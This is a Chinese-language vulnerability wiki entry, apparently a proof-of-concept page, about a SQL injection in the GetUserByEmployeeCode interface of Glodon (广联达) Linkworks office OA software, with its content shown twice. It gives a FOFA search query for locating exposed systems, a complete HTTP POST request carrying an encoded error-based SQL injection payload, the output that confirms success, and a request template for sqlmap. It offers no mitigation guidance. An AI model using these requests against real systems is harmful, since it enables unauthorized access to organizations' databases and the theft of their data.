fofamini-wiki

登录白背景

源码

广联达OA GetUserByEmployeeCode SQL注入漏洞

一、漏洞简介

广联达办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetUserByEmployeeCode接口未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。

二、影响版本

广联达办公OA

三、资产测绘

app.name="广联达 OA"
登录页面

四、漏洞复现

POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

employeeCode=1%27+AND+9748+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289748%3D9748%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29+AND+%27KENl%27%3D%27KENl&EncryptData=1

qbvjq1qxzzq

sqlmap

POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

employeeCode=1&EncryptData=1

原文: https://www.yuque.com/xiaokp7/ocvun2/dsu77fhiig45sd05

# 广联达OA GetUserByEmployeeCode SQL注入漏洞

# 一、漏洞简介
广联达办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetUserByEmployeeCode接口未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。

# 二、影响版本

- 广联达办公OA

# 三、资产测绘

- app.name="广联达 OA"
- 登录页面

![image.png](./img/ojZO03G3m-j3tyuS/1693579287118-af540618-cbfd-44d4-82b6-cf9792772477-678882.png)

# 四、漏洞复现
```
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

employeeCode=1%27+AND+9748+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289748%3D9748%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29+AND+%27KENl%27%3D%27KENl&EncryptData=1
```
![image.png](./img/ojZO03G3m-j3tyuS/1706861860162-804b7f92-73c6-4028-8500-f10c6125a5d7-322748.png)
```
qbvjq1qxzzq
```
sqlmap
```
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

employeeCode=1&EncryptData=1
```
![image.png](./img/ojZO03G3m-j3tyuS/1706861904488-c648dbc6-21bf-4a11-bc99-7b71c3c96443-770748.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dsu77fhiig45sd05>